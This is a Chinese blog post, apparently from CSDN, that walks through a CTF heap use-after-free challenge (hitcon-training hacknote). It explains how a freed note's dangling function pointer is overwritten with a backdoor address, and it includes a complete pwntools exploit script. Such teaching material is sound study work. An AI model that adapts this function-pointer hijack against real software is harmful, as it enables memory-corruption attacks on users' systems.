堆利用_Use After Free

于 2024-09-19 20:53:15 发布
阅读量713 收藏 26
点赞数 17
文章标签: c# 开发语言 linux 网络 安全 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhuo1358/article/details/142368173
版权

Use After Free

原理

我们可以直接从字面上翻译它的意思:使用被释放的内存块。其实当一个内存块被释放之后重新使用有如下几种情况:

内存块被释放后,其对应的指针被设置为NULL,再次使用时程序会崩溃
内存块被释放后,其对应的指针没有被设置为NULL,在它下一次被使用之前,没有代码对这块内存块进行修改,那么程序有可能可以正常运转
内存块被释放后,其对应的指针没有被设置为NULL,但是在下一次使用之前,有代码对这块内存进行了修改,那么当程序再次使用这块内存时,就很有可能出现问题

具体的调试示例青参考下面这篇文章  这个作者还是讲的较为通俗易懂,同时这个知识也较为简单

好好说话之Use After Free

接下来我会通过题目来讲解什么是UAF

hitcon-training-hacknote

函数名被我编辑过,大家可以用ida右键编辑方便自己记忆

add_note函数

 

我们仔细分析一下函数的代码,这个函数是用来创建chunk的,并把chunk地址放到(notelist+4)中

 

而(notelist+i)用来存放printf_note_content函数地址

delnote函数

这个函数是用来释放chunk的,但是我们发现它并没有释放chunk的指针,这为我们UAF创造了条件

printf_note函数

这个函数就是调用存在(notelist+i)里的print_note_content函数进行打印

magic函数

这是出题人给的后门函数 

思路

可以看到这个整个程序里面并没有堆溢出的地方

那么,我们先创建两个chunk来调试一下

可以看到两个chunk是通过各自的结构体chunk相连的,可以看到,每一个结构体的大小为0x10

 

这里面存的就是printf_note_content的地址

我们打印看看

可以看到是正常的

那么接下来再释放掉

可以看到chunk已经被free掉了,但是对应的指针还没有

在上面对函数的分析中知道,print_note函数的执行是依赖于notelist中存的chunk指针的

那么我们是否可以把print_note_content函数的地址覆盖成magic函数,再来调用print_note函数来getflag呢?(有点绕,请仔细理解一下),答案是肯定的。

那么我们接下来的思路就是如何把print_note_content覆盖

getflag

这个程序中并没有编辑函数来让我们修改

但是程序中的add_note函数是可以修改内容的

在free的时候,我们发现结构体同样也是被free的,这里面有两个0x10大小的free_chunk

设想一下,如果我们申请0x8大小的chunk,那么他的大小刚好等于0x10,申请的时候就不会从新分配空间,而是从fastbin里面取出来,那么我们就可以对其中有一个chunk进行编辑

size=p32(pre_size)+p32(size)+0x8=0x10

 代码如下

 

 

 可以看到此时print_note_content的位置已被magic函数替代

而这个结构体对应的是chunk0

那么直接printf_note(0)即可getflag

 

 完整的exp

from pwn import*
io=process('./hacknote2')
gdb.attach(io)
shell=0x8048986
chunk=0x804a070
def add(size,content):
	io.recvuntil("Your choice :")
	io.sendline("1")
	io.recvuntil("Note size :")
	io.sendline(str(size))
	io.recvuntil("Content :")
	io.sendline(content)

def printf(idx):
	io.recvuntil("Your choice :")
	io.sendline('3')
	io.recvuntil("Index :")
	io.sendline(str(idx))
def free(idx):
	io.recvuntil("Your choice :")
	io.sendline('2')
	io.recvuntil("Index :")
	io.sendline(str(idx))


add(24,'aaaa')
add(24,'aaaa')
free(0)
free(1)
payload=p32(shell)
add(8,payload)
printf(0)
io.interactive()
pause()

参考文献

好好说话之Use After Free

ctfwiki_Use After Free

呀卡吗洗.
关注
use after free 引起KE
兰宝的专栏
10-12 825
问题背景: 待机状态下,按Power键或者自动进入休眠,必现KE。 分析过程: 取出mtklog看到有db产生,确实发生了KE(kernel exception),取出db和vmlinux (必须是和当前软件是同一次编译的)后,使用GAT工具解开db,取出SYS_MINI_RDUMP,使用 gdb调试: $ arm-linux-androideabi-gdb v
溢出----Use After Free
qq_42192672的博客
10-23 4802
学习资料:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/use_after_free/ 不得不说有些被坑的感觉,Off-By-One也太难了,问了下大神,我觉得还是先把这个弄懂,那篇学习记录我就先咕咕咕了 以下截图来自CTFWIKI,感觉说的概念挺明确的 从这里我深刻体会到了栈和的不同,以及的困难,没有EIP给我直接...
Use After Free
钞sir的博客
01-11 8450
我恋你如烈酒般浓 我恨你如风如影朦 一清晨这一朦胧 粉身碎骨亦不逢 原理 use_after_free就是其字面所表达的意思,当一个内存块被释放之后再次被使用。但是其实这里有以下几种情况: 内存块被释放后,其对应的指针被设置为 NULL , 然后再次使用,自然程序会崩溃。 内存块被释放后,其对应的指针没有被设置为NULL,然后在它下一次被使用之前,没有代码对这块内存块进行修改,那么程序很有可...
UAF (Use After Free)漏洞分析及利用
热门推荐
4ct10n
06-23 2万+
因为大作业的需求要调试一个浏览器的UAF漏洞,首先必须对UAF漏洞有个整体的了解,本篇文章主要讲解UAF造成的原因以及利用方法,这里结合2016年HCTF fheap
做leetcode过程中遇到heap-use-after-free问题的解决方法
cncxycpp的博客
05-11 1万+
heap-use-after-free 背景:leetcode 25 K个一组翻转链表 用了很长时间解决这个问题,过程中心态甚至有一点小小波动。 问题截图: 问题解释:在释放后使用,意思是我使用了释放后的空间吗??(看了程序没有发现问题) 由于之前没有遇到过类似问题,所以选择了在网上寻找答案,看看有没有遇到相同问题的同学分享经验: 发现有位同学分享的是delete之后再次使用空间,就会报相同错,可是我并没有使用delete。 再找了一会发现没有能利用的,大多是对于这个错误的解释和工具使用方法,所以
警告背后的use after free
兰宝的专栏
10-11 2183
问题背景: 工模测试出现自动重启。 分析过程: 用GAT解开db,并结合对应的vmlinux(该文件必须和db一致,具体请看FAQ06985),利用工具E-Consulter分析(也可以参考FAQ13941),分析里几个db发现都是内存踩坏,随机踩,这种情况要么是软件引入的,要么是硬件故障。 做以下调查: 单体复现还是多台机器出现?什么时候出现?之前是否就存在?复现概
利用 - Use After Free
yms0211的博客
03-22 1111
利用 - Use After Free 概述: Use after free ,直译过来就是在释放后再利用,那么是怎么在释放后再利用的呢? 其实这个释放后再利用主要是因为在程序中原本指向某些函数或块的指针在块被free或函数结束后指针本身确没有被置空,那么这个没有被置空的指针所在的块虽然被释放了,但是我们却还可以通过程序内对块内部的操作来执行这个指针指向的函数。 #以下的内容截取自CTF-wiki# 块被释放后一般有以下几种情况: 内存块被释放后,其对应的指针被设置为 NULL , 然后
Use After Free (hacknote为例)
fzucaicai的博客
03-30 280
gcc hacknote.c -no-pie -o hacknote (自己编译下,关掉pie会更好)这题的思路无非就是利用free块后,对应指向该块的指针没有置空,仍然指向这一块内存,因此我们仍然可以使用这个指针去做某些事情,例如在这里的print_note函数,我们仍然可以利用未置空的指针去输出对应的内容,这也是一个造成内存泄露的点。在这里是存在一个后门函数的,就是magic函数,刚好就是system("cat falg"),这也非常明显了,我们就是要通过某种途径,让程序执行这个后门函数。
[pwn]Use After Free
Breeze的博客
09-06 8611
Use After Free:time_formatter writeup UAF漏洞就是Use After Free,再释放后继续使用,Use After Free会引发各种奇怪的现象,根据场景的不同并没有一种统一的利用方式。下面看题目:time_formatter 日常惯例,先查看安全策略: 开启了canary、NX、ASLR,然后查看一下程序逻辑: 很常见的菜单,下面查看一下各种功能:...
好好说话之Use After Free
hollk’s blog
09-28 4915
到了Use After Free啦,总体来说这种手法并不复杂,特征也很明显,就是在静态分析阶段观察释放chunk之后指针是否置空。本以为参加hw会往后拖更,没想到这么快就写完了。如果前面一直跟着学的话这部分也应该难不到你,我会在接下来的Fastbin Attack等你,加油~
pwn 之use_after_free
Maxmalloc的博客
12-08 547
题目链接 先贴出源代码 add_note notelist[i] = malloc(8u); ... *(_DWORD *)notelist[i] = print_note_content; printf("Note size :"); read(0, &buf, 8u); size = atoi(&am...
Use After Free Tutorial
sdulibh的专栏
08-09 3194
Halvar Flake 在”Third Generation Exploitation”中,按照攻击的难度把漏洞利用技术分为了3个层次: (1) 第一类是基础的栈溢出利用。攻击者可以利用返回地址等轻松劫持进程,植入shellcode,例如,对strcpy,strcat等函数进行攻击。 (2) 第二类是高级的栈溢出漏洞。这时,栈中有许多限制因素。 (3) 第三类攻击则是溢出利用及格式化串漏
溢出漏洞之UAF--(Use After Free)
半岛铁盒的博客
06-02 979
具体原理 在释放内存后未将指向原内存的指针置为null,use after free的意思就是在释放以后进行use。当我们重新申请与之前释放掉的内存大小相同的块时,就会就先问题. 可以继续使用之前释放掉的那块内存。但是再次使用时,因为指针指向的内存包含的数据不是原来的数据了,此时的引用对于正常程序来说是有风险的; 这是个UAF的错误例子 ...
use-after-free漏洞发现之旅use-after-free漏洞发现之旅
weixin_33851177的博客
03-20 667
2019独角兽企业重金招聘Python工程师标准>>> ...
通过UseAfterFree实现命令执行
weixin_33748818的博客
10-18 196
本贴讲述如何利用UAF漏洞,实现GOT表覆盖,从而实现命令执行,另外漏洞程序由本人通过逆向14年的ctf获得,同时进行了一些功能的精简,从而得到下面的漏洞程序,解决漏洞讲解没有漏洞源码源码的问题。 漏洞程序,是一个用链表实现的简单留言板,用户可以查看消息,并对相关的消息进行:回复、删除、修改。 漏洞代码uaf.c如下: #include <stdi...
heap use after free
最新发布
06-28
### 回答1: 使用后释放错误(heap use after free)是指在程序中使用了已经被释放的内存。这种错误通常会导致程序崩溃或者出现不可预测的行为。为了避免这种错误,程序员需要在使用完内存后及时释放它,并且在释放后不再使用该内存。 ### 回答2: heap use after free是一种常见的内存使用错误,它指的是在使用内存时,释放了某个内存块,但后续又继续使用了该内存块。这种错误可以导致程序崩溃、数据损坏,甚至是安全漏洞。 通常,内存的分配和释放是由程序员负责的。在程序中,当需要动态分配一块内存时,通常使用malloc()函数,在使用完该内存块之后,需要通过free()函数来释放该内存块。但是,如果程序员在释放内存块之后,依然在程序中继续使用该内存块,则会发生heap use after free错误。 具体来说,当程序释放内存块时,操作系统会将该内存块标记为可用的状态,但是并不会真正销毁该内存块,这意味着该内存块中原有的数据可能还存在,但已经不再属于该内存块。如果程序员在已经释放了内存块的情况下,继续使用该内存块,则可能会覆盖该内存块原有的数据,导致数据损坏。此外,由于已经释放的内存块可能会被操作系统重复利用,这也可能会导致内存中存在未预期的数据。 为了避免heap use after free错误,程序员可以采取一些措施。首先,应该在使用内存块之前检查该内存块是否已经被释放,以确保不会继续使用已经释放的内存块。其次,在释放内存块之后,可以将指向该内存块的指针设置为NULL,以避免意外地继续使用该内存块。此外,可以使用一些内存检测工具,如Valgrind等,来帮助检测和排除heap use after free错误。 ### 回答3: Heap use after free溢出)是一种常见的内存管理错误,它会导致程序崩溃或者安全漏洞。 当程序中使用malloc()、realloc()、calloc()等动态分配内存的函数后,程序会在区域内分配内存,同时也会记录该块内存的大小和地址等信息。而当程序中释放该块内存时,通过free()函数将其返回给操作系统并将相关记录清空,但是在程序中,如果继续使用已经释放的内存,就会导致Heap use after free错误。 通常,程序员在使用free()函数释放内存后,应该将指向该内存的指针设置为NULL,以避免后续误用该指针。否则,指针会指向之前释放的内存地址,后续再次访问该指针就会导致程序崩溃或者执行错误的操作。 溢出还可能是一些恶意程序攻击的手段。攻击者在程序中制造类似的溢出漏洞,以便在运行时利用该漏洞来执行恶意代码。这种攻击被称为溢出攻击(Heap Overflow Attack)。 对于企业和个人开发者来说,避免Heap use after free错误可以通过以下几个方面来做到。 1. 了解内存分配释放的细节,在编写程序时注意不要出现内存泄露、重复释放等问题。 2. 使用内存分配和释放函数时,必须正确地管理内存指针,不要造成内存泄露或者重复释放的问题。 3. 使用编译器的内存检查工具进行内存检查,如Valgrind、Clang、GCC等。 4. 在编写程序时,可以使用一些内存管理工具和库,如Boost库、STL库等。这些工具和库可以帮助程序员进行内存管理和错误检测,减少代码错误的可能性。 总之,了解和避免Heap use after free错误是编写高质量、可靠和安全的程序的必要条件之一。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值